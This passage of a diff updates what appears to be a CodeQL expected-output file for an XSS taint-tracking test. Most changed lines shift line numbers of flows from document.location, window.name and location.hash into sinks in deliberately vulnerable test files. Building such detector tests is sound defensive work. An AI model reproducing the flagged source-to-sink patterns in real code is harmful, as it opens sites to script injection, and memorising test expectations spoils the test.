semmle.label | tainted | -| tst.js:189:33:189:39 | tainted | semmle.label | tainted | -| tst.js:191:54:191:60 | tainted | semmle.label | tainted | -| tst.js:192:45:192:51 | tainted | semmle.label | tainted | -| tst.js:193:49:193:55 | tainted | semmle.label | tainted | -| tst.js:197:9:197:42 | tainted | semmle.label | tainted | -| tst.js:197:19:197:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:199:67:199:73 | tainted | semmle.label | tainted | -| tst.js:200:67:200:73 | tainted | semmle.label | tainted | -| tst.js:204:35:204:41 | tainted | semmle.label | tainted | -| tst.js:206:46:206:52 | tainted | semmle.label | tainted | -| tst.js:207:38:207:44 | tainted | semmle.label | tainted | -| tst.js:208:35:208:41 | tainted | semmle.label | tainted | -| tst.js:212:28:212:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | -| tst.js:213:28:213:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | -| tst.js:214:28:214:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | -| tst.js:218:32:218:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | -| tst.js:225:28:225:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | -| tst.js:226:28:226:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | -| tst.js:227:28:227:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | -| tst.js:231:32:231:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | -| tst.js:236:35:236:41 | tainted | semmle.label | tainted | -| tst.js:238:20:238:26 | tainted | semmle.label | tainted | -| tst.js:240:23:240:29 | tainted | semmle.label | tainted | -| tst.js:241:23:241:29 | tainted | semmle.label | tainted | -| tst.js:247:39:247:55 | props.propTainted | semmle.label | props.propTainted | -| tst.js:251:60:251:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | -| tst.js:255:23:255:29 | tainted | semmle.label | tainted | -| tst.js:259:7:259:17 | window.name | semmle.label | window.name | -| tst.js:260:7:260:10 | name | semmle.label | name | -| tst.js:264:11:264:21 | window.name | semmle.label | window.name | -| tst.js:280:22:280:29 | location | semmle.label | location | -| tst.js:285:9:285:29 | tainted | semmle.label | tainted | -| tst.js:285:19:285:29 | window.name | semmle.label | window.name | -| tst.js:288:59:288:65 | tainted | semmle.label | tainted | -| tst.js:301:9:301:16 | location | semmle.label | location | -| tst.js:302:10:302:10 | e | semmle.label | e | -| tst.js:303:20:303:20 | e | semmle.label | e | -| tst.js:308:10:308:17 | location | semmle.label | location | -| tst.js:310:10:310:10 | e | semmle.label | e | -| tst.js:311:20:311:20 | e | semmle.label | e | -| tst.js:316:35:316:42 | location | semmle.label | location | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:327:18:327:34 | document.location | semmle.label | document.location | -| tst.js:331:7:331:43 | params | semmle.label | params | -| tst.js:331:7:331:43 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | -| tst.js:331:16:331:43 | getTain ... hParams | semmle.label | getTain ... hParams | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | -| tst.js:332:18:332:23 | params | semmle.label | params | -| tst.js:332:18:332:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:332:18:332:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | -| tst.js:341:20:341:36 | document.location | semmle.label | document.location | -| tst.js:343:5:343:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | -| tst.js:343:5:343:17 | getUrl().hash | semmle.label | getUrl().hash | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | -| tst.js:348:7:348:39 | target | semmle.label | target | -| tst.js:348:16:348:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:349:12:349:17 | target | semmle.label | target | -| tst.js:355:10:355:42 | target | semmle.label | target | -| tst.js:355:19:355:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:356:16:356:21 | target | semmle.label | target | -| tst.js:357:20:357:25 | target | semmle.label | target | -| tst.js:360:21:360:26 | target | semmle.label | target | -| tst.js:363:18:363:23 | target | semmle.label | target | -| tst.js:371:7:371:39 | target | semmle.label | target | -| tst.js:371:16:371:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:374:18:374:23 | target | semmle.label | target | -| tst.js:381:7:381:39 | target | semmle.label | target | -| tst.js:381:16:381:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:384:18:384:23 | target | semmle.label | target | -| tst.js:386:18:386:23 | target | semmle.label | target | -| tst.js:386:18:386:29 | target.taint | semmle.label | target.taint | -| tst.js:391:3:391:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | -| tst.js:391:19:391:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:392:18:392:23 | target [taint3] | semmle.label | target [taint3] | -| tst.js:392:18:392:30 | target.taint3 | semmle.label | target.taint3 | -| tst.js:397:18:397:23 | target | semmle.label | target | -| tst.js:397:18:397:30 | target.taint5 | semmle.label | target.taint5 | -| tst.js:406:18:406:23 | target | semmle.label | target | -| tst.js:406:18:406:30 | target.taint7 | semmle.label | target.taint7 | -| tst.js:408:3:408:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | -| tst.js:408:19:408:24 | target | semmle.label | target | -| tst.js:408:19:408:24 | target [taint8] | semmle.label | target [taint8] | -| tst.js:408:19:408:31 | target.taint8 | semmle.label | target.taint8 | -| tst.js:409:18:409:23 | target [taint8] | semmle.label | target [taint8] | -| tst.js:409:18:409:30 | target.taint8 | semmle.label | target.taint8 | -| tst.js:416:7:416:46 | payload | semmle.label | payload | -| tst.js:416:17:416:36 | window.location.hash | semmle.label | window.location.hash | -| tst.js:416:17:416:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst.js:417:18:417:24 | payload | semmle.label | payload | -| tst.js:419:7:419:55 | match | semmle.label | match | -| tst.js:419:15:419:34 | window.location.hash | semmle.label | window.location.hash | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | -| tst.js:421:20:421:24 | match | semmle.label | match | -| tst.js:421:20:421:27 | match[1] | semmle.label | match[1] | -| tst.js:424:18:424:37 | window.location.hash | semmle.label | window.location.hash | -| tst.js:424:18:424:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | -| tst.js:424:18:424:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | -| tst.js:428:7:428:39 | target | semmle.label | target | -| tst.js:428:16:428:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:430:18:430:23 | target | semmle.label | target | -| tst.js:430:18:430:89 | target. ... data>') | semmle.label | target. ... data>') | -| tst.js:436:6:436:38 | source | semmle.label | source | -| tst.js:436:15:436:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:440:28:440:33 | source | semmle.label | source | -| tst.js:441:33:441:38 | source | semmle.label | source | -| tst.js:442:34:442:39 | source | semmle.label | source | -| tst.js:443:41:443:46 | source | semmle.label | source | -| tst.js:444:44:444:49 | source | semmle.label | source | -| tst.js:445:32:445:37 | source | semmle.label | source | -| tst.js:453:7:453:39 | source | semmle.label | source | -| tst.js:453:16:453:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:455:18:455:23 | source | semmle.label | source | -| tst.js:456:18:456:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | -| tst.js:456:36:456:41 | source | semmle.label | source | -| tst.js:460:6:460:38 | source | semmle.label | source | -| tst.js:460:15:460:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:463:21:463:26 | source | semmle.label | source | -| tst.js:465:19:465:24 | source | semmle.label | source | -| tst.js:467:20:467:25 | source | semmle.label | source | -| tst.js:471:7:471:46 | url | semmle.label | url | -| tst.js:471:13:471:36 | documen ... .search | semmle.label | documen ... .search | -| tst.js:471:13:471:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:473:19:473:21 | url | semmle.label | url | -| tst.js:474:26:474:28 | url | semmle.label | url | -| tst.js:475:25:475:27 | url | semmle.label | url | -| tst.js:476:20:476:22 | url | semmle.label | url | -| tst.js:486:22:486:24 | url | semmle.label | url | -| tst.js:491:23:491:35 | location.hash | semmle.label | location.hash | -| tst.js:491:23:491:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:494:18:494:30 | location.hash | semmle.label | location.hash | -| tst.js:494:18:494:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:501:33:501:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| tst.js:501:43:501:62 | window.location.hash | semmle.label | window.location.hash | -| tst.js:508:7:508:39 | target | semmle.label | target | -| tst.js:508:16:508:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:509:18:509:23 | target | semmle.label | target | -| tst.js:509:18:509:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| tst.js:47:16:47:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:48:16:48:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:26:48:30 | bar() | semmle.label | bar() | +| tst.js:50:34:50:34 | s | semmle.label | s | +| tst.js:51:18:51:18 | s | semmle.label | s | +| tst.js:53:25:53:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:54:25:54:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:56:16:56:20 | bar() | semmle.label | bar() | +| tst.js:58:1:58:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | +| tst.js:58:3:58:26 | documen ... .search | semmle.label | documen ... .search | +| tst.js:58:46:58:46 | x | semmle.label | x | +| tst.js:60:20:60:20 | x | semmle.label | x | +| tst.js:63:49:63:72 | documen ... .search | semmle.label | documen ... .search | +| tst.js:67:26:67:49 | documen ... .search | semmle.label | documen ... .search | +| tst.js:68:25:68:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:70:33:70:56 | documen ... .search | semmle.label | documen ... .search | +| tst.js:71:32:71:55 | documen ... .search | semmle.label | documen ... .search | +| tst.js:76:39:76:62 | documen ... .search | semmle.label | documen ... .search | +| tst.js:82:30:82:53 | documen ... .search | semmle.label | documen ... .search | +| tst.js:88:25:88:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:7:93:44 | v | semmle.label | v | +| tst.js:93:11:93:34 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:11:93:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:95:18:95:18 | v | semmle.label | v | +| tst.js:120:18:120:18 | v | semmle.label | v | +| tst.js:132:29:132:50 | window. ... .search | semmle.label | window. ... .search | +| tst.js:135:29:135:29 | v | semmle.label | v | +| tst.js:135:49:135:49 | v | semmle.label | v | +| tst.js:139:29:139:46 | xssSourceService() | semmle.label | xssSourceService() | +| tst.js:142:40:142:61 | window. ... .search | semmle.label | window. ... .search | +| tst.js:161:9:161:41 | target | semmle.label | target | +| tst.js:161:18:161:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:164:28:164:33 | target | semmle.label | target | +| tst.js:168:9:168:42 | tainted | semmle.label | tainted | +| tst.js:168:19:168:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:170:31:170:37 | tainted | semmle.label | tainted | +| tst.js:172:42:172:48 | tainted | semmle.label | tainted | +| tst.js:173:33:173:39 | tainted | semmle.label | tainted | +| tst.js:175:54:175:60 | tainted | semmle.label | tainted | +| tst.js:176:45:176:51 | tainted | semmle.label | tainted | +| tst.js:177:49:177:55 | tainted | semmle.label | tainted | +| tst.js:181:9:181:42 | tainted | semmle.label | tainted | +| tst.js:181:19:181:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:183:67:183:73 | tainted | semmle.label | tainted | +| tst.js:184:67:184:73 | tainted | semmle.label | tainted | +| tst.js:188:35:188:41 | tainted | semmle.label | tainted | +| tst.js:190:46:190:52 | tainted | semmle.label | tainted | +| tst.js:191:38:191:44 | tainted | semmle.label | tainted | +| tst.js:192:35:192:41 | tainted | semmle.label | tainted | +| tst.js:196:28:196:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | +| tst.js:197:28:197:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | +| tst.js:198:28:198:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | +| tst.js:202:32:202:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | +| tst.js:209:28:209:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | +| tst.js:210:28:210:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | +| tst.js:211:28:211:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | +| tst.js:215:32:215:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | +| tst.js:220:35:220:41 | tainted | semmle.label | tainted | +| tst.js:222:20:222:26 | tainted | semmle.label | tainted | +| tst.js:224:23:224:29 | tainted | semmle.label | tainted | +| tst.js:225:23:225:29 | tainted | semmle.label | tainted | +| tst.js:231:39:231:55 | props.propTainted | semmle.label | props.propTainted | +| tst.js:235:60:235:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | +| tst.js:239:23:239:29 | tainted | semmle.label | tainted | +| tst.js:243:7:243:17 | window.name | semmle.label | window.name | +| tst.js:244:7:244:10 | name | semmle.label | name | +| tst.js:248:11:248:21 | window.name | semmle.label | window.name | +| tst.js:264:22:264:29 | location | semmle.label | location | +| tst.js:269:9:269:29 | tainted | semmle.label | tainted | +| tst.js:269:19:269:29 | window.name | semmle.label | window.name | +| tst.js:272:59:272:65 | tainted | semmle.label | tainted | +| tst.js:285:9:285:16 | location | semmle.label | location | +| tst.js:286:10:286:10 | e | semmle.label | e | +| tst.js:287:20:287:20 | e | semmle.label | e | +| tst.js:292:10:292:17 | location | semmle.label | location | +| tst.js:294:10:294:10 | e | semmle.label | e | +| tst.js:295:20:295:20 | e | semmle.label | e | +| tst.js:300:35:300:42 | location | semmle.label | location | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:311:18:311:34 | document.location | semmle.label | document.location | +| tst.js:315:7:315:43 | params | semmle.label | params | +| tst.js:315:7:315:43 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | +| tst.js:315:16:315:43 | getTain ... hParams | semmle.label | getTain ... hParams | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | +| tst.js:316:18:316:23 | params | semmle.label | params | +| tst.js:316:18:316:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:316:18:316:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | +| tst.js:325:20:325:36 | document.location | semmle.label | document.location | +| tst.js:327:5:327:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | +| tst.js:327:5:327:17 | getUrl().hash | semmle.label | getUrl().hash | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | +| tst.js:332:7:332:39 | target | semmle.label | target | +| tst.js:332:16:332:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:333:12:333:17 | target | semmle.label | target | +| tst.js:339:10:339:42 | target | semmle.label | target | +| tst.js:339:19:339:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:340:16:340:21 | target | semmle.label | target | +| tst.js:341:20:341:25 | target | semmle.label | target | +| tst.js:344:21:344:26 | target | semmle.label | target | +| tst.js:347:18:347:23 | target | semmle.label | target | +| tst.js:355:7:355:39 | target | semmle.label | target | +| tst.js:355:16:355:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:357:18:357:23 | target | semmle.label | target | +| tst.js:364:7:364:39 | target | semmle.label | target | +| tst.js:364:16:364:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:367:18:367:23 | target | semmle.label | target | +| tst.js:369:18:369:23 | target | semmle.label | target | +| tst.js:369:18:369:29 | target.taint | semmle.label | target.taint | +| tst.js:374:3:374:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | +| tst.js:374:19:374:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:375:18:375:23 | target [taint3] | semmle.label | target [taint3] | +| tst.js:375:18:375:30 | target.taint3 | semmle.label | target.taint3 | +| tst.js:380:18:380:23 | target | semmle.label | target | +| tst.js:380:18:380:30 | target.taint5 | semmle.label | target.taint5 | +| tst.js:389:18:389:23 | target | semmle.label | target | +| tst.js:389:18:389:30 | target.taint7 | semmle.label | target.taint7 | +| tst.js:391:3:391:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | +| tst.js:391:19:391:24 | target | semmle.label | target | +| tst.js:391:19:391:24 | target [taint8] | semmle.label | target [taint8] | +| tst.js:391:19:391:31 | target.taint8 | semmle.label | target.taint8 | +| tst.js:392:18:392:23 | target [taint8] | semmle.label | target [taint8] | +| tst.js:392:18:392:30 | target.taint8 | semmle.label | target.taint8 | +| tst.js:399:7:399:46 | payload | semmle.label | payload | +| tst.js:399:17:399:36 | window.location.hash | semmle.label | window.location.hash | +| tst.js:399:17:399:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst.js:400:18:400:24 | payload | semmle.label | payload | +| tst.js:402:7:402:55 | match | semmle.label | match | +| tst.js:402:15:402:34 | window.location.hash | semmle.label | window.location.hash | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | +| tst.js:404:20:404:24 | match | semmle.label | match | +| tst.js:404:20:404:27 | match[1] | semmle.label | match[1] | +| tst.js:407:18:407:37 | window.location.hash | semmle.label | window.location.hash | +| tst.js:407:18:407:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | +| tst.js:407:18:407:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | +| tst.js:411:7:411:39 | target | semmle.label | target | +| tst.js:411:16:411:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:413:18:413:23 | target | semmle.label | target | +| tst.js:413:18:413:89 | target. ... data>') | semmle.label | target. ... data>') | +| tst.js:419:6:419:38 | source | semmle.label | source | +| tst.js:419:15:419:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:423:28:423:33 | source | semmle.label | source | +| tst.js:424:33:424:38 | source | semmle.label | source | +| tst.js:425:34:425:39 | source | semmle.label | source | +| tst.js:426:41:426:46 | source | semmle.label | source | +| tst.js:427:44:427:49 | source | semmle.label | source | +| tst.js:428:32:428:37 | source | semmle.label | source | +| tst.js:436:7:436:39 | source | semmle.label | source | +| tst.js:436:16:436:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:438:18:438:23 | source | semmle.label | source | +| tst.js:439:18:439:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | +| tst.js:439:36:439:41 | source | semmle.label | source | +| tst.js:443:6:443:38 | source | semmle.label | source | +| tst.js:443:15:443:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:446:21:446:26 | source | semmle.label | source | +| tst.js:448:19:448:24 | source | semmle.label | source | +| tst.js:450:20:450:25 | source | semmle.label | source | +| tst.js:454:7:454:46 | url | semmle.label | url | +| tst.js:454:13:454:36 | documen ... .search | semmle.label | documen ... .search | +| tst.js:454:13:454:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:456:19:456:21 | url | semmle.label | url | +| tst.js:457:26:457:28 | url | semmle.label | url | +| tst.js:458:25:458:27 | url | semmle.label | url | +| tst.js:459:20:459:22 | url | semmle.label | url | +| tst.js:469:22:469:24 | url | semmle.label | url | +| tst.js:474:23:474:35 | location.hash | semmle.label | location.hash | +| tst.js:474:23:474:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:477:18:477:30 | location.hash | semmle.label | location.hash | +| tst.js:477:18:477:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:484:33:484:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| tst.js:484:43:484:62 | window.location.hash | semmle.label | window.location.hash | +| tst.js:491:7:491:39 | target | semmle.label | target | +| tst.js:491:16:491:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:492:18:492:23 | target | semmle.label | target | +| tst.js:492:18:492:54 | target. ... "), '') | semmle.label | target. ... "), '') | | typeahead.js:9:28:9:30 | loc | semmle.label | loc | | typeahead.js:10:16:10:18 | loc | semmle.label | loc | | typeahead.js:20:13:20:45 | target | semmle.label | target | @@ -831,8 +831,8 @@ edges | jwt-server.js:7:9:7:35 | taint | jwt-server.js:9:16:9:20 | taint | provenance | | | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:7:9:7:35 | taint | provenance | | | jwt-server.js:9:16:9:20 | taint | jwt-server.js:9:55:9:61 | decoded | provenance | | -| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:11:19:11:25 | decoded | provenance | | -| jwt-server.js:11:19:11:25 | decoded | jwt-server.js:11:19:11:29 | decoded.foo | provenance | | +| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:10:19:10:25 | decoded | provenance | | +| jwt-server.js:10:19:10:25 | decoded | jwt-server.js:10:19:10:29 | decoded.foo | provenance | | | jwt.js:4:36:4:39 | data | jwt.js:5:30:5:33 | data | provenance | | | jwt.js:5:9:5:34 | decoded | jwt.js:6:14:6:20 | decoded | provenance | | | jwt.js:5:19:5:34 | jwt_decode(data) | jwt.js:5:9:5:34 | decoded | provenance | | @@ -879,12 +879,12 @@ edges | pages/[id].jsx:5:18:5:29 | router.query | pages/[id].jsx:5:9:5:14 | { id } | provenance | | | pages/[id].jsx:13:44:13:49 | params [id] | pages/[id].jsx:13:44:13:52 | params.id | provenance | | | pages/[id].jsx:16:44:16:49 | params [q] | pages/[id].jsx:16:44:16:51 | params.q | provenance | | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [id] | pages/[id].jsx:3:30:3:35 | params [id] | provenance | | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [q] | pages/[id].jsx:3:30:3:35 | params [q] | provenance | | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [id] | pages/[id].jsx:3:30:3:35 | params [id] | provenance | | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [q] | pages/[id].jsx:3:30:3:35 | params [q] | provenance | | | pages/[id].jsx:25:11:25:24 | context.params | pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | provenance | | -| pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [id] | provenance | | +| pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [id] | provenance | | | pages/[id].jsx:26:10:26:22 | context.query | pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | provenance | | -| pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [q] | provenance | | +| pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [q] | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:18:8:24 | tainted | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:9:27:9:33 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | @@ -943,8 +943,8 @@ edges | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:22:11:22:30 | source | provenance | | | translate.js:6:7:6:39 | target | translate.js:7:42:7:47 | target | provenance | | | translate.js:6:16:6:39 | documen ... .search | translate.js:6:7:6:39 | target | provenance | | -| translate.js:7:7:7:61 | searchParams | translate.js:9:27:9:38 | searchParams | provenance | | -| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:9:27:9:38 | searchParams [MapValue] | provenance | | +| translate.js:7:7:7:61 | searchParams | translate.js:8:27:8:38 | searchParams | provenance | | +| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:8:27:8:38 | searchParams [MapValue] | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) | translate.js:7:7:7:61 | searchParams | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | translate.js:7:7:7:61 | searchParams [MapValue] | provenance | | | translate.js:7:42:7:47 | target | translate.js:7:42:7:60 | target.substring(1) | provenance | | @@ -954,8 +954,8 @@ edges | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | -| translate.js:9:27:9:38 | searchParams | translate.js:9:27:9:50 | searchP ... 'term') | provenance | Config | -| translate.js:9:27:9:38 | searchParams [MapValue] | translate.js:9:27:9:50 | searchP ... 'term') | provenance | | +| translate.js:8:27:8:38 | searchParams | translate.js:8:27:8:50 | searchP ... 'term') | provenance | Config | +| translate.js:8:27:8:38 | searchParams [MapValue] | translate.js:8:27:8:50 | searchP ... 'term') | provenance | | | trusted-types-lib.js:1:28:1:28 | x | trusted-types-lib.js:2:12:2:12 | x | provenance | | | trusted-types.js:3:62:3:62 | x | trusted-types.js:3:67:3:67 | x | provenance | | | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:62:3:62 | x | provenance | | @@ -973,217 +973,217 @@ edges | tst3.js:7:32:7:35 | data | tst3.js:7:32:7:37 | data.p | provenance | | | tst3.js:9:37:9:40 | data | tst3.js:9:37:9:42 | data.p | provenance | | | tst3.js:10:38:10:41 | data | tst3.js:10:38:10:43 | data.p | provenance | | -| tst.js:2:7:2:39 | target | tst.js:5:18:5:23 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:12:28:12:33 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:20:42:20:47 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:4:18:4:23 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:9:28:9:33 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:17:42:17:47 | target | provenance | | | tst.js:2:16:2:39 | documen ... .search | tst.js:2:7:2:39 | target | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | Config | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | Config | -| tst.js:12:28:12:33 | target | tst.js:12:5:12:42 | '
    ' | provenance | Config | -| tst.js:17:7:17:56 | params | tst.js:18:18:18:23 | params | provenance | | -| tst.js:17:7:17:56 | params [MapValue] | tst.js:18:18:18:23 | params [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | tst.js:17:16:17:56 | (new UR ... hParams | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams | tst.js:17:7:17:56 | params | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | tst.js:17:7:17:56 | params [MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams] | provenance | | -| tst.js:18:18:18:23 | params | tst.js:18:18:18:35 | params.get('name') | provenance | Config | -| tst.js:18:18:18:23 | params [MapValue] | tst.js:18:18:18:35 | params.get('name') | provenance | | -| tst.js:20:7:20:61 | searchParams | tst.js:21:18:21:29 | searchParams | provenance | | -| tst.js:20:7:20:61 | searchParams [MapValue] | tst.js:21:18:21:29 | searchParams [MapValue] | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) | tst.js:20:7:20:61 | searchParams | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | tst.js:20:7:20:61 | searchParams [MapValue] | provenance | | -| tst.js:20:42:20:47 | target | 